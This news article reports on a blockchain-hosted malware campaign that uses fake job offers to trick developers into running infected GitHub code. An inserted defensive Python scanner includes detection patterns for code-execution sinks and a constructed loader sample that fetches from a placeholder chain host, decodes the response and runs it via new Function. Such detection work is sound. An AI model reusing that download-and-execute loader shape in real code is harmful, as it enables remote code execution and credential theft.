Malware Is Sleeping on the Blockchain, and It’s Already Infected Dozens of Global Targets

It started with a work offer. Last year, the blockchain crime-detection firm Crystal Intelligence’s then-vice president of engineering received a LinkedIn message from a man asking if he would be up for some freelance web development.

The VP quickly grew suspicious. He knew that North Korean hackers known as Contagious Interview regularly use fake job offers to scam targets out of their cryptocurrency. Since this “job” involved running code from GitHub, he decided to check it out and made a crucial discovery: Hidden in the GitHub code was the start of an attack chain, formatted so that most developers doing what they think is an innocuous contract job wouldn’t notice.

That code, when run, reaches out to the TRON or Aptos blockchains, publicly accessible ledgers that record and facilitate cryptocurrency transactions (specifically favored because transactions there are cheap), and pulls information it uses as a “pointer” to the Binance Smart Chain. The Binance Smart Chain, in turn, pulls code that “fetches the final form—malicious code,” said Nick Smart, Crystal Intelligence’s chief intelligence officer. When run, that code can gain access to so much information on victims’ devices that investigators at Ransom-ISAC, a small, recently formed group of international cybersecurity professionals working across different anti-cybercrime organizations, dubbed it Omnistealer.

“It literally steals everything,” said Ellis Stannard, a core member of Ransom-ISAC. His team found that this Omnistealer was compatible with more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase; more than 10 password managers, including LastPass; more than 10 web browsers, including Chrome and Firefox; and cloud storage services like Google Drive. That means, in addition to stealing cryptocurrency, it could also swipe passwords and privileged credentials for accessing organizations’ information.
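As an added illustration of the staged retrieval described above (this is example code, not code from the article, Crystal Intelligence or Ransom-ISAC), the following Python heuristic flags repository files that combine a reference to a public chain endpoint with a dynamic code-execution sink, the two ingredients of the loader the investigators describe. It is the kind of check a developer can run over a "freelance job" repository before executing anything in it. The keyword lists, the placeholder host tron.example and the two sample files are constructed for this example and are not indicators from the investigation.

```python
"""Heuristic scanner for staged 'chain-pointer' loader code in a repository.

Added example, not the article's or the investigators' tooling. A file is
'suspicious' when it both references a public blockchain endpoint AND contains
a dynamic code-execution sink; 'review' when it has only one of the two.
All keyword lists below are assumptions chosen for illustration.
"""
import re
from dataclasses import dataclass
from pathlib import Path

# Assumed chain keywords: the chains named in the article plus generic RPC terms.
CHAIN_PATTERNS = {
    "tron": r"\btron\b|trongrid|tronscan",
    "aptos": r"\baptos\b",
    "bsc": r"\bbsc\b|bscscan|binance|\bbnb\b",
    "rpc": r"eth_call|eth_getTransactionByHash|jsonrpc",
}
# Assumed execution sinks for JS/TS and Python sources.
SINK_PATTERNS = {
    "eval": r"\beval\s*\(",
    "Function": r"\bnew\s+Function\s*\(",
    "exec": r"\bexec\s*\(",
    "child_process": r"child_process|subprocess",
    "vm": r"\bvm\.runIn(New|This)Context",
}
# Assumed decoding helpers often seen between the fetch and the sink.
DECODE_PATTERNS = {
    "base64": r"\batob\s*\(|base64",
    "hex": r"['\"]hex['\"]|fromhex",
}


def _hits(patterns: dict, text: str) -> list:
    """Return the sorted names of every pattern that matches the text."""
    return sorted(n for n, p in patterns.items() if re.search(p, text, re.IGNORECASE))


@dataclass
class Finding:
    path: str
    chain_hits: list
    sink_hits: list
    decode_hits: list

    @property
    def verdict(self) -> str:
        if self.chain_hits and self.sink_hits:
            return "suspicious"
        if self.chain_hits or self.sink_hits:
            return "review"
        return "clean"


def scan_text(text: str, path: str = "<inline>") -> Finding:
    """Classify one source file's contents."""
    return Finding(path, _hits(CHAIN_PATTERNS, text),
                   _hits(SINK_PATTERNS, text), _hits(DECODE_PATTERNS, text))


def scan_tree(root, exts=(".js", ".mjs", ".cjs", ".ts", ".py")) -> list:
    """Walk a checkout and return every non-clean Finding, skipping node_modules."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in exts and "node_modules" not in p.parts:
            f = scan_text(p.read_text(errors="replace"), str(p))
            if f.verdict != "clean":
                findings.append(f)
    return findings


# Constructed sample: an ordinary balance lookup that touches a chain but runs no code.
BENIGN_SAMPLE = """// constructed sample, placeholder host
const TronWeb = require("tronweb");
const tronWeb = new TronWeb({ fullHost: "https://tron.example" });
async function balance(addr) { return tronWeb.trx.getBalance(addr); }
"""

# Constructed sample: the loader shape the article describes (placeholder host, no real pointer).
SUSPICIOUS_SAMPLE = """// constructed sample, placeholder host
const res = await fetch("https://tron.example/v1/contracts/PLACEHOLDER");
const ptr = (await res.json()).data;
const stage2 = Buffer.from(ptr, "hex").toString("utf8");
new Function(stage2)();
"""


def demo() -> dict:
    """Write the two samples into a temp checkout, scan it, return {filename: verdict}."""
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        Path(d, "balance.js").write_text(BENIGN_SAMPLE)
        Path(d, "setup.js").write_text(SUSPICIOUS_SAMPLE)
        Path(d, "README.md").write_text("eval( mentioned in prose, wrong extension, ignored")
        return {Path(f.path).name: f.verdict for f in scan_tree(d)}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The scanner is deliberately a triage aid, not a verdict: a "review" on a legitimate web3 project is expected, and a loader can defeat keyword matching by assembling strings at runtime, so a "clean" result is no reason to skip running unfamiliar code in an isolated environment.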

What first appeared to be a common job-interview phishing campaign ultimately revealed a hack so widespread and easy to replicate that investigators fear irreversible damage. Malware deployed via seemingly innocent GitHub repositories and embedded in blockchains, where the malware will be stored forever (and increasingly difficult to root out as the chains grow), makes for an almost unstoppable technology.



Ransom-ISAC researchers spoke exclusively with PCMag about the targets of this attack, their theories about the scammers’ motivations, and concerns about the hack’s sheer volume. Smart compares its scope to WannaCry, the high-profile global ransomware attack that affected more than 200,000 computers in 2017. Investigators believe Omnistealer will spread much wider than its 2017 predecessor. What’s even more concerning is that we don’t know the hackers’ ultimate goal, whether it’s to simply collect data, obtain remote access to various systems, or something else.


Image: An aerial view of the Vladivostok bridge (Credit: Getty Images)

Upon further digging, investigators linked this malware activity to some telling IP addresses. In particular, they came across one address associated with the former US general consulate building in Vladivostok, Russia, which other cybercrime researchers had previously linked to North Korean state-backed actors.

“Yesterday, Vladivostok had more cash in it as reserves than Moscow,” Smart told me in December, and that’s not because the roughly 600,000-person city is home to the one percent. Rather, the hackers Smart and colleagues traced to an IP address in this city have been using the wily method his team uncovered to pilfer millions of dollars’ worth of cryptocurrency. The sneakiest part? The code these hackers used to start the chain reaction that ultimately deploys the Omnistealer malware had, in some cases, been hidden in blockchain transactions for years before activation—like a code-based sleeper agent.

“Hiding malicious payloads within blockchain has become an emerging obfuscation technique,” reads a blog post written by collaborators at Ransom-ISAC. However, the “attack chains” investigators uncovered here stand out for their reach—around 300,000 stolen credentials have been linked to this hack so far, says Stannard, and that’s likely the tip of the iceberg. So far, compromised organizations include cybersecurity firms, defense companies, and government entities in countries like the US and Bangladesh. 

Ransom-ISAC’s blog post calls the hack “more sophisticated” than what they’ve seen from some North Korean state actors who have perpetrated scams via false job interviews in the past. What investigators uncovered was a complex attack involving blockchain infrastructure, malware that functions across various platforms, and thousands of software developers and the companies that hire them.


Global Developers and Contractors Are the First Line of Attack

As of January, the hackers perpetrating these attacks have been doing so by disguising themselves in one of two ways to reach what appear to be their ultimate targets—businesses that tend to outsource their software engineering with little oversight.

To gain access, the hackers pose either as recruiters hiring contractors on behalf of those companies, using company credentials the scammers can obtain with Omnistealer, or as freelance developers seeking to be hired themselves.

Ransom-ISAC researchers found that using these two methods, hackers obtained emails and credentials for a wide array of organizations, including an adult industry company, a French financial compliance firm, a kosher food delivery service, and security and defense companies.

Multiple email addresses and credentials leaked in these hacks were linked to US military domains, and some exposed email addresses ended in .gov. One company is an approved supplier to Lockheed Martin, the US-based defense and aerospace contractor. Other major targets include an Indian firm specializing in surveillance and electronic warfare, an AI solutions company, and a global web design agency. (Investigators asked that we not publish organization names for national security reasons.)



When hackers masquerade as recruiters, they “hire” contractors who unwittingly deploy malware. The hackers might do this by having developers run sneakily infected GitHub code, like what the Crystal Intelligence VP found. These contractors typically reside in South Asian countries like India and are opportune initial targets for several reasons. Not only was India the “largest source of new developers on GitHub” in 2025, according to the platform, but it also topped blockchain analysis company Chainalysis’s crypto adoption index that year, making developers there an attractive target for digital currency thieves. Plus, targets in countries where people generally make lower incomes may be less likely to turn down job offers. Ultimately, the scammers appear to use their initial contractor targets as unsuspecting mules for the malware payload.


Image: Telegram, WhatsApp, Messages and other phone apps on an iPhone screen (Credit: Getty Images)

LinkedIn, Upwork, Telegram: How Hackers Recruit the Unwitting

Scammers involved in this operation usually initiate contact via platforms like LinkedIn, Upwork, Telegram, and Discord. In response to our request for comment, a LinkedIn representative shared posts it has published to help users spot fake jobs and recruiters. An Upwork representative told PCMag that the jobs site “encourages” customers to exercise caution with “unfamiliar downloads” and use “secure testing environments” when working off its platform.

Hackers looking to be hired as freelancers, meanwhile, infect the companies that hire them firsthand. They “push out garbage pull requests in GitHub that contain hidden malware,” Stannard says. “Since this case, I haven’t been able to look at GitHub the same way.” 

It’s unclear why these hackers would want inside access to organizations like kosher delivery services—perhaps they’re just casting a wide net to see what they can access. That said, the presence of companies concerned with defense, security, and sensitive radar systems among the apparent ultimate targets raises obvious red flags.


State-Linked Hackers May Be Pulling the Strings

It can be difficult to determine who’s behind complex hacks like this, but investigators believe state-sponsored North Korean hackers may be responsible. Some specific malware and IP addresses, including the one from Vladivostok, overlapped with infrastructure previously used by North Korean actors.

Security company Trend Micro has documented that actors who’ve worked on past operations benefiting the North Korean government have used these addresses, particularly in scams involving fake recruiters. A 2019 NATO paper called North Korea’s Cyber Operations and Strategies cited links between North Korea and Vladivostok, noting that “North Korea decided to expand its internet connection to Russia” around 2017.

Some of the crypto wallets used in these hacks were also linked to the North Korean state actors known for their involvement in WannaCry and the 2014 hack of Sony Pictures by Lazarus Group. Specifically, investigators linked the wallets involved in this hack to Lazarus Group’s $1.5 billion theft from the Dubai-based cryptocurrency exchange Bybit back in February 2025. 

However, this group’s tactics resemble those of Contagious Interview more than Lazarus, says Nick Carlsen, a senior investigator specializing in North Korea at the blockchain intelligence company TRM Labs. In an interview, he noted that Contagious moves their stolen crypto gains using “completely different” methods than Lazarus. He described Contagious as a “smaller subset group,” adding that different levels of the North Korean government have their own hacking teams, much as the CIA, FBI, and NSA do.



While the North Korean thefts that Carlsen has observed focus on stealing cryptocurrency to fund the nation’s operations (such as building nuclear weapons), he suggests that the hackers Ransom-ISAC has been investigating could also use the credentials they’ve obtained to create fake identities for North Korean IT workers. With those false personas, these IT workers could more easily open accounts not associated with North Korea to help launder ill-gotten gains for its government. Carlsen also raises other possible financially motivated scenarios for this hack, such as the perpetrators selling online the credentials they’ve accessed on underground markets.

“Everything about this has DPRK written all over it,” Stannard said. He explained that these aren’t some guys messing around in a basement. They’re organized actors using malware that can extract both corporate access credentials and cryptocurrency, both extremely valuable resources for a widely sanctioned nation.

Image: A screenshot of North Korea's military command structure, pulled from a NATO report (Credit: NATO)

The Malware Isn’t Going Away—and Neither Is the Threat

Nefarious actors will likely continue to use blockchain-encoded malware for theft because it’s cheap to execute. And once that malware is embedded in the blockchain, it’s there to stay. Then, as more transactions take place on the chain, they further bury the malware, making it exceptionally difficult—and expensive—to track, given the long hours investigators must devote to the search. Adding AI-assisted coding to this mix makes it relatively simple for even amateur coders to replicate these attacks.

Meanwhile, wide swaths of South Asian freelance software developers and contract companies could face consequences from lost credentials and reduced confidence.

Smart and Stannard say they’ve informed the FBI’s Internet Crime Complaint Center about their findings. In response to PCMag’s request for comment, the FBI said it is “aware of the DPRK utilizing social engineering tactics to target developers in the blockchain development space, and this technique highlights the continuing evolution of the DPRK’s ability to exploit the web3 space.” Because of “ongoing investigations,” the bureau wouldn’t elaborate further.

Still, Smart and Stannard have lingering questions. Namely, while investigating the malicious code hidden in these blockchain transactions, they found additional surprises, such as audio and image files secreted within.

One hidden file reveals a human chest X-ray (I showed it to a doctor, who said it appeared normal). Another featured a paper about rocket propulsion. Smart contacted a rocket scientist, who called it “kind of a crap paper,” but theoretically sound. Possibly, these files show hackers testing what they can hide on the blockchain.

“My thought was, ‘This is a numbers station,'” said Smart, referring to the shortwave radio stations through which intelligence workers transmit clandestine messages via seemingly random numbers. “But I’ve got no evidence to prove it.”

While investigators still don’t know why hackers have been hiding cryptic audio and image files along with malware on these blockchains, they believe finding out more about the hackers’ identities could shed light on these remaining mysteries. So far, the search has led investigators to Airbnbs in Southeast Asia, where groups of alleged hackers operate—and potentially test what kinds of information they can conceal using this cryptocurrency-enabled technology.
